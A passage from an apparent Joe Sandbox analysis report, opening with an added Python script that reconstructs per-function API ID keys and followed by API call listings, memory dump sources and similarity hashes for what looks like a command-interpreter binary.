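The "API ID" under each Similarity heading is the per-function key Joe Sandbox uses to match a function across reports. The scheme implemented below is an inference from the records on this page, not a documented Joe Sandbox algorithm: every call is counted, including the "Part of subcall function" lines; Win32/NT names are split on CamelCase and tokens of three characters or fewer (Get, Set, Rtl, Nt, Ex, W) are dropped; CRT names such as memset and _wcsicmp stay whole; mangled C++ names are ignored; tokens are grouped by occurrence count, groups are joined with "$" in descending order, and tokens inside a group are sorted in plain ASCII order (uppercase before "_" before lowercase). This is an added example, not code from the report or from Joe Sandbox, and it does not reproduce the numeric "API String ID" hashes. The two listings embedded in it are copied from this page's own records (the NtQueryInformationProcess/ReadProcessMemory function and the GetFileAttributesW function directly above), with argument lists shortened.

```python
"""Rebuild the Joe Sandbox per-function "API ID" from an APIs listing.
Tokenisation rules are inferred from the records on this page (assumption)."""
from __future__ import annotations

import re
from collections import Counter

# One "APIs" bullet: optional subcall prefix, Name.Module, optional (args), ref: addr
API_LINE = re.compile(
    r"(?:Part of subcall function (?P<caller>[0-9A-F]+):\s*)?"
    r"(?P<name>[^\s.(]+)\.(?P<module>[^\s(]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)"
)

def parse_apis(listing: str) -> list[dict]:
    """Turn the bullet lines of an APIs section into call records."""
    calls = []
    for line in listing.splitlines():
        m = API_LINE.search(line)
        if m:
            calls.append({
                "name": m["name"],
                "module": m["module"],
                "args": m["args"].split(",") if m["args"] else [],
                "ref": m["ref"],
                "caller": m["caller"],      # None for a direct call
            })
    return calls

def api_tokens(name: str) -> list[str]:
    """Inferred tokenisation: mangled names dropped, CRT names kept whole,
    Win32/NT names split on CamelCase with tokens of <= 3 chars removed."""
    if name.startswith("?"):            # ??_V@YAXPAX@Z (mangled operator delete[])
        return []
    if not name[0].isupper():           # memset, _wcsicmp, longjmp, wcsrchr
        return [name]
    words = re.findall(r"[A-Z][a-z0-9]*", name)   # AcquireSRWLockShared -> Acquire S R W Lock Shared
    return [w for w in words if len(w) > 3]

def api_id(listing: str) -> str:
    """Group tokens by count (descending, "$"-joined), ASCII-sorted within a group."""
    counts = Counter()
    for call in parse_apis(listing):
        counts.update(api_tokens(call["name"]))
    by_count: dict[int, list[str]] = {}
    for tok, n in counts.items():
        by_count.setdefault(n, []).append(tok)
    return "$".join("".join(sorted(by_count[n])) for n in sorted(by_count, reverse=True))

# Listings copied from this report's records (arguments shortened).
RPM_LISTING = """\
• LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(NTDLL.DLL,00000000), ref: 00066069
• GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,NtQueryInformationProcess), ref: 0006607E
• ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000480,?), ref: 000660DC
• ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000004,00000000), ref: 00066128
• ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000002,00000000), ref: 0006614F
• ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,00000000,?,00000002,00000000), ref: 00066186
"""

FILEATTR_LISTING = """\
• memset.MSVCRT ref: 00048060
  • Part of subcall function 0004E3F0: memset.MSVCRT ref: 0004E455
• ??_V@YAXPAX@Z.MSVCRT(?,-00000001,00000000), ref: 000481BE
  • Part of subcall function 0004DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?), ref: 0004DCE1
  • Part of subcall function 0004DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 0004DCE8
• GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000), ref: 0004818C
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00048197
• longjmp.MSVCRT(00080A30,00000001), ref: 0005B09E
• EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00067FC9), ref: 0005B0AB
• LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00067FC9), ref: 0005B0C1
• fprintf.MSVCRT ref: 0005B0D5
• fflush.MSVCRT ref: 0005B0E3
  • Part of subcall function 00048F21: _wcsicmp.MSVCRT ref: 00048FCD
  • Part of subcall function 00048F21: _wcsicmp.MSVCRT ref: 00048FE3
  • Part of subcall function 00048F21: GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00049002
  • Part of subcall function 00048F21: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00049013
  • Part of subcall function 00048E9E: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00088BF0), ref: 00048EC3
  • Part of subcall function 00051CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000), ref: 00051D3A
  • Part of subcall function 00051CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?), ref: 00051D44
  • Part of subcall function 00051CD5: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?), ref: 00051D57
  • Part of subcall function 00051CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?), ref: 00051D61
  • Part of subcall function 000501F5: wcsrchr.MSVCRT ref: 000501FB
"""

if __name__ == "__main__":
    print(api_id(RPM_LISTING))       # MemoryProcessRead$AddressLibraryLoadProc
    print(api_id(FILEATTR_LISTING))  # Error$Mode$AttributesCriticalFileHeapLastSection_wcsicmpmemset$...
```

Recomputing the key this way is useful when a report has been exported as text and you want to pivot on a function across several samples without re-deriving the fuzzy hashes; the parsed records from `parse_apis` also give you the direct-versus-subcall distinction and the `ref` addresses for a quick cross-check against a disassembly.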
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                       • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: memset
                                                                      • String ID: %s
                                                                      • API String ID: 2221118986-3043279178
                                                                      • Opcode ID: a5942d24b404a9e74bb9895f90449c1578ccdeeee121bccc0b0efffcfea79b9b
                                                                      • Instruction ID: a0d330ec8aba113bc713f3a8c33098a6fe654ecd1836f8c04ae35333dc6b6a08
                                                                      • Opcode Fuzzy Hash: a5942d24b404a9e74bb9895f90449c1578ccdeeee121bccc0b0efffcfea79b9b
                                                                      • Instruction Fuzzy Hash: 6A917F716083429BE770DF10D855BBBB3E4BF94346F00092DE98997191EB78EA48CB53
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                       • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: wcschr$iswdigit
                                                                      • String ID: +-~!$<>+-*/%()|^&=,
                                                                      • API String ID: 2770779731-632268628
                                                                      • Opcode ID: 2742dfd6fdf0417355fe36863d37c97f919e54a64a55315f2f08a0103a30f32d
                                                                      • Instruction ID: 3eac49f58bdf6255a217b961e6dd413bafc87bd59e7424cc45760bc1da880e91
                                                                      • Opcode Fuzzy Hash: 2742dfd6fdf0417355fe36863d37c97f919e54a64a55315f2f08a0103a30f32d
                                                                      • Instruction Fuzzy Hash: DF119172304A129FA7649F6ADC44877B7E8FF9B7B2720002EF980D7650EB29DD058664
                                                                      APIs
                                                                        • Part of subcall function 00049A11: _get_osfhandle.MSVCRT ref: 00049A1C
                                                                        • Part of subcall function 00049A11: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0004793A,00000104,?), ref: 00049A2B
                                                                        • Part of subcall function 00049A11: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,00047908,00002374,-00000001), ref: 00049A47
                                                                        • Part of subcall function 00049A11: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00088E04,00000002,?,?,?,?,?,?,?,?,?,?,?,?,00047908,00002374), ref: 00049A56
                                                                        • Part of subcall function 00049A11: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00047908,00002374), ref: 00049A61
                                                                        • Part of subcall function 00049A11: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00088E04,?,?,?,?,?,?,?,?,?,?,?,?,00047908,00002374,-00000001), ref: 00049A6A
                                                                      • _get_osfhandle.MSVCRT ref: 000586E3
                                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 000586EB
                                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000002), ref: 0005872A
                                                                      • _get_osfhandle.MSVCRT ref: 00058743
                                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 0005874B
                                                                        • Part of subcall function 00049B3B: _get_osfhandle.MSVCRT ref: 00049B4E
                                                                        • Part of subcall function 00049B3B: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00080AF0,000000FF,0007A7F0,00002000,00000000,00000000), ref: 00049B8E
                                                                        • Part of subcall function 00049B3B: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,0007A7F0,-00000001,?,00000000), ref: 00049BA3
                                                                      • longjmp.MSVCRT(00080A30,00000001), ref: 000587CE
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                       • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: Console_get_osfhandle$Write$FileLockModeShared$AcquireByteCharHandleMultiReleaseTypeWidelongjmp
                                                                      • String ID:
                                                                      • API String ID: 1333215474-0
                                                                      • Opcode ID: 2e002650d1a0d276f8731474c2d7a582d4fc3f490578ef06c0591f7ca848e767
                                                                      • Instruction ID: bc9a2f60089449f5fb6f354aca89985033b1b6e29a4fce3e53882bdfa5aaedb5
                                                                      • Opcode Fuzzy Hash: 2e002650d1a0d276f8731474c2d7a582d4fc3f490578ef06c0591f7ca848e767
                                                                      • Instruction Fuzzy Hash: 2D51D770740305EBEB24AB74D849BAFB3E4EB04712F10853AED42E7582EB74DD448B55
                                                                      APIs
                                                                        • Part of subcall function 0004BC30: wcschr.MSVCRT ref: 0004BCA7
                                                                        • Part of subcall function 0004BC30: iswspace.MSVCRT ref: 0004BD1D
                                                                        • Part of subcall function 0004BC30: wcschr.MSVCRT ref: 0004BD39
                                                                        • Part of subcall function 0004BC30: wcschr.MSVCRT ref: 0004BD5D
                                                                      • iswspace.MSVCRT ref: 000461E4
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                       • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: wcschr$iswspace
                                                                      • String ID:
                                                                      • API String ID: 3458554142-0
                                                                      • Opcode ID: ed0c90a824f88792f4bdd8b6c7863786a41bb907e24842aced6e9c8d1ca81c30
                                                                      • Instruction ID: b53b4db295485df19c738345788eeb926d1adc9b607e8339ce568f4c3a8398fe
                                                                      • Opcode Fuzzy Hash: ed0c90a824f88792f4bdd8b6c7863786a41bb907e24842aced6e9c8d1ca81c30
                                                                      • Instruction Fuzzy Hash: 1D91A0B0A04614DEEB24DF65DC45AAE77F4FF45301F14812EE80AE7290EB7A5884CF55
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                       • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: _wcsicmp
                                                                      • String ID: ELSE$IF/?
                                                                      • API String ID: 2081463915-1134991328
                                                                      • Opcode ID: 1a8d1ce0b5dbc294ac340c1c66414e308df52721c76c390718fb75745e990fed
                                                                      • Instruction ID: 27ef1425f773a811c3f51b10896e4f0706ed1424cfe8be8383dbce04c309e334
                                                                      • Opcode Fuzzy Hash: 1a8d1ce0b5dbc294ac340c1c66414e308df52721c76c390718fb75745e990fed
                                                                      • Instruction Fuzzy Hash: 1E517DB27443029EF7749B35AC49F6B33E0AB41311F14043EE8469A192EEB9D844C75A
                                                                      APIs
                                                                        • Part of subcall function 0005643A: NtOpenThreadToken.NTDLL ref: 00056454
                                                                        • Part of subcall function 0005643A: NtOpenProcessToken.NTDLL(000000FF,00000008,00000000), ref: 0005646C
                                                                        • Part of subcall function 0005643A: NtClose.NTDLL ref: 000564BD
                                                                      • SetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000), ref: 000563B5
                                                                      • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 000563E3
                                                                      • RtlNtStatusToDosError.NTDLL ref: 00061EF4
                                                                      • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00061EFB
                                                                      • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(?,00000104,?,000000FF,00000002,00000000), ref: 00061F6B
                                                                      • wcsstr.MSVCRT ref: 00061F86
                                                                      • wcsstr.MSVCRT ref: 00061FA4
                                                                        • Part of subcall function 0005640A: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001900,00000000,?,00000000,?,00000000,?,?,?,?,00069C96,0005FDFA,00000000,?), ref: 0005642F
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
                                                                      • String ID:
                                                                      • API String ID: 1313749407-0
                                                                      • Opcode ID: 7609d448af5e0ec7be411b41224d3ef64cbc94a71a700cb6070863cca1cd759e
                                                                      • Instruction ID: 04dfc376507436663ee8c7aecad0f14b6778e9b7951af4e3784970daf8a79555
                                                                      • Opcode Fuzzy Hash: 7609d448af5e0ec7be411b41224d3ef64cbc94a71a700cb6070863cca1cd759e
                                                                      • Instruction Fuzzy Hash: 33510171A002298BEF609F649C886EF72E5EF54311F5800B9ED09E7241EB75DE89CF94
                                                                      APIs
                                                                      • memset.MSVCRT ref: 00069AC2
                                                                        • Part of subcall function 0004E3F0: memset.MSVCRT ref: 0004E455
                                                                      • SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,-00000105,?,00000000,?), ref: 00069B22
                                                                      • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00000000,?), ref: 00069B32
                                                                      • SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,-00000105,?,00000000,?), ref: 00069BAD
                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?), ref: 00069BB8
                                                                      • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?), ref: 00069BCB
                                                                      • ??_V@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,?), ref: 00069BF9
                                                                      Similarity
                                                                      • API ID: Error$CurrentDirectoryModememset$Last
                                                                      • String ID:
                                                                      • API String ID: 1725644760-0
                                                                      • Opcode ID: ab6856c9e358ee936432c10d02ebe664c0f33a080766053f8a49e1e321e6b92f
                                                                      • Instruction ID: 0c5cc91d92fc736a1b8106100e32c614bdbb286ea4765c28a356b16858b738e8
                                                                      • Opcode Fuzzy Hash: ab6856c9e358ee936432c10d02ebe664c0f33a080766053f8a49e1e321e6b92f
                                                                      • Instruction Fuzzy Hash: 71418171A002189BEF14DFA4EC85BEEB7F9FF48710F0481A9E905E7250EB789944CB55
                                                                      APIs
                                                                      • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,000000FF,?,?,?,00067FC9,?,000699AE,00000000,?,00000000,0005CF94,00000000,?), ref: 00048203
                                                                      • GetExitCodeProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,000000FF,?,00067FC9,?,000699AE,00000000,?,00000000,0005CF94,00000000,?), ref: 0004820E
                                                                      • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,00067FC9,?,000699AE,00000000,?,00000000,0005CF94,00000000,?), ref: 00048229
                                                                      • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00067FC9,?,000699AE,00000000,?,00000000,0005CF94,00000000,?), ref: 0005B0AB
                                                                      • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00067FC9,?,000699AE,00000000,?,00000000,0005CF94,00000000,?), ref: 0005B0C1
                                                                      • fprintf.MSVCRT ref: 0005B0D5
                                                                      • fflush.MSVCRT ref: 0005B0E3
                                                                      Similarity
                                                                      • API ID: CriticalSection$CloseCodeEnterExitHandleLeaveObjectProcessSingleWaitfflushfprintf
                                                                      • String ID:
                                                                      • API String ID: 4271573189-0
                                                                      • Opcode ID: dd0c5f996075cd8115259f6ba9b313841c4388cef3a5f427be8ecddf19100e4c
                                                                      • Instruction ID: ced8d61bfdd69825fdbb0c949c972b4505eaed10e62a94ca87f12bf482033a98
                                                                      • Opcode Fuzzy Hash: dd0c5f996075cd8115259f6ba9b313841c4388cef3a5f427be8ecddf19100e4c
                                                                      • Instruction Fuzzy Hash: 6601A230505210FFFB106BE8ED0EA8A3BACFF0A325F104256F555A21F2CBBD16409B66
                                                                      APIs
                                                                      • memset.MSVCRT ref: 00053D30
                                                                        • Part of subcall function 0004E3F0: memset.MSVCRT ref: 0004E455
                                                                      • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000000,?,?,-00000105,?,?,00000000), ref: 00053E3D
                                                                      • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,00000000), ref: 00053E88
                                                                      Similarity
                                                                      • API ID: memset$FullNamePath
                                                                      • String ID:
                                                                      • API String ID: 3158150540-0
                                                                      • Opcode ID: 9be5daa99d9da970f24f26531efbecdcb6dc083276296caf2c90eb7538708819
                                                                      • Instruction ID: 81f126763f0140070507102cc2b1fd90e66492a26dbd8513cb08f9ea8eb4c2c0
                                                                      • Opcode Fuzzy Hash: 9be5daa99d9da970f24f26531efbecdcb6dc083276296caf2c90eb7538708819
                                                                      • Instruction Fuzzy Hash: 7602C234A001169BDB64DF68DC997BAB3F1FF48311F1881A9DC0A97291D738AE86CF54
                                                                      APIs
                                                                      • _get_osfhandle.MSVCRT ref: 0005858D
                                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00058595
                                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000002), ref: 000585D4
                                                                      • _get_osfhandle.MSVCRT ref: 000585ED
                                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 000585F5
                                                                      Similarity
                                                                      • API ID: Console$Write_get_osfhandle$Mode
                                                                      • String ID:
                                                                      • API String ID: 1066134489-0
                                                                      • Opcode ID: 0db2e1834e086c0793218d657485009fe6a779c391c8e6b392ed8a15b7cb1b9b
                                                                      • Instruction ID: 62a937eb09e1da9400b8d2125dba6af0ed9fb28999ad56d84bd2f74f6548909c
                                                                      • Opcode Fuzzy Hash: 0db2e1834e086c0793218d657485009fe6a779c391c8e6b392ed8a15b7cb1b9b
                                                                      • Instruction Fuzzy Hash: E2419171B002109BEF249F78D889BAFB3A5EB40346F14847AED46EB186EE74DD44CB51
                                                                      APIs
                                                                        • Part of subcall function 00049A11: _get_osfhandle.MSVCRT ref: 00049A1C
                                                                        • Part of subcall function 00049A11: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0004793A,00000104,?), ref: 00049A2B
                                                                        • Part of subcall function 00049A11: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,00047908,00002374,-00000001), ref: 00049A47
                                                                        • Part of subcall function 00049A11: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00088E04,00000002,?,?,?,?,?,?,?,?,?,?,?,?,00047908,00002374), ref: 00049A56
                                                                        • Part of subcall function 00049A11: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00047908,00002374), ref: 00049A61
                                                                        • Part of subcall function 00049A11: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00088E04,?,?,?,?,?,?,?,?,?,?,?,?,00047908,00002374,-00000001), ref: 00049A6A
                                                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00088E04,?,?,?,00080AF0,00000002,?,?,0005A669,%s %s ,?,?,00000000), ref: 000499DC
                                                                      • _get_osfhandle.MSVCRT ref: 000499EC
                                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,0005A669,%s %s ,?,?,00000000), ref: 000499F4
                                                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00088E04), ref: 00049A09
                                                                        • Part of subcall function 00049B3B: _get_osfhandle.MSVCRT ref: 00049B4E
                                                                        • Part of subcall function 00049B3B: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00080AF0,000000FF,0007A7F0,00002000,00000000,00000000), ref: 00049B8E
                                                                        • Part of subcall function 00049B3B: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,0007A7F0,-00000001,?,00000000), ref: 00049BA3
                                                                      Similarity
                                                                      • API ID: LockShared$_get_osfhandle$AcquireConsoleFileReleaseWrite$ByteCharHandleModeMultiTypeWide
                                                                      • String ID:
                                                                      • API String ID: 4057327938-0
                                                                      • Opcode ID: 0be847a2ee7a54dfcd32967d41e48c544ce8a9902603930391637b4f629117a9
                                                                      • Instruction ID: 737da3afb7c8bc4b638cd3b3803d015de2edad7d9c857a7704c793d57cffd0d7
                                                                      • Opcode Fuzzy Hash: 0be847a2ee7a54dfcd32967d41e48c544ce8a9902603930391637b4f629117a9
                                                                      • Instruction Fuzzy Hash: AA21D872744305AFF7346AA85C8AF6B2298EB81B56F14003FFA46C61C2EEA4CC048295
                                                                      APIs
                                                                        • Part of subcall function 0004BC30: wcschr.MSVCRT ref: 0004BCA7
                                                                        • Part of subcall function 0004BC30: iswspace.MSVCRT ref: 0004BD1D
                                                                        • Part of subcall function 0004BC30: wcschr.MSVCRT ref: 0004BD39
                                                                        • Part of subcall function 0004BC30: wcschr.MSVCRT ref: 0004BD5D
                                                                      • _wcsicmp.MSVCRT ref: 000675AC
                                                                      • _wcsicmp.MSVCRT ref: 000675CB
                                                                      • _wcsicmp.MSVCRT ref: 000675F1
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: _wcsicmpwcschr$iswspace
                                                                      • String ID: KEYS$LIST$OFF
                                                                      • API String ID: 3924973218-4129271751
                                                                      • Opcode ID: 8a3282a8a3fa891d7e60b26dcabdaa47e9fa9d8f493fd016947fa2ab941a8954
                                                                      • Instruction ID: bdf3eea1119f7f4596c7ea79fb0abf64953ee804ea5f8e9684ae63a65eefa8ea
                                                                      • Opcode Fuzzy Hash: 8a3282a8a3fa891d7e60b26dcabdaa47e9fa9d8f493fd016947fa2ab941a8954
                                                                      • Instruction Fuzzy Hash: 1211803120CB009AF3296725DC8697B73DAFBC5728364407FF50B850C1EEA85A01835D
                                                                      APIs
                                                                      • _get_osfhandle.MSVCRT ref: 0004DDA3
                                                                      • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0005C050), ref: 0004DDAD
                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 0004DDD6
                                                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00088E04,00000001), ref: 0004DDE5
                                                                      • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 0004DDF0
                                                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00088E04), ref: 0004DDF9
                                                                      Similarity
                                                                      • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                                      • String ID:
                                                                      • API String ID: 513048808-0
                                                                      • Opcode ID: 460a74be10b8c665baf9300cbd015e44c0ccdc1e892621948d8197fcc281c4c0
                                                                      • Instruction ID: 8a074f2ea4ff35abc8a6d82b1bc9f2f6418b0b5e94c31f6943e819e1af8e4823
                                                                      • Opcode Fuzzy Hash: 460a74be10b8c665baf9300cbd015e44c0ccdc1e892621948d8197fcc281c4c0
                                                                      • Instruction Fuzzy Hash: A81123B3C18214ABFB2547689D4CB2A3AE8F787338F240237E816924A0C63D4D01CB95
                                                                      APIs
                                                                      • _get_osfhandle.MSVCRT ref: 00049A1C
                                                                      • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0004793A,00000104,?), ref: 00049A2B
                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,00047908,00002374,-00000001), ref: 00049A47
                                                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00088E04,00000002,?,?,?,?,?,?,?,?,?,?,?,?,00047908,00002374), ref: 00049A56
                                                                      • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00047908,00002374), ref: 00049A61
                                                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00088E04,?,?,?,?,?,?,?,?,?,?,?,?,00047908,00002374,-00000001), ref: 00049A6A
                                                                      Similarity
                                                                      • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                                      • String ID:
                                                                      • API String ID: 513048808-0
                                                                      • Opcode ID: 63ce04006d68f7a5b7e4ae6f41e159ef166c2b9e3c7203ab628c95dd1c5c33f6
                                                                      • Instruction ID: e0ee941d44815d47c5ebb5fc63767a6622392d6250f0d1b239987d860a637289
                                                                      • Opcode Fuzzy Hash: 63ce04006d68f7a5b7e4ae6f41e159ef166c2b9e3c7203ab628c95dd1c5c33f6
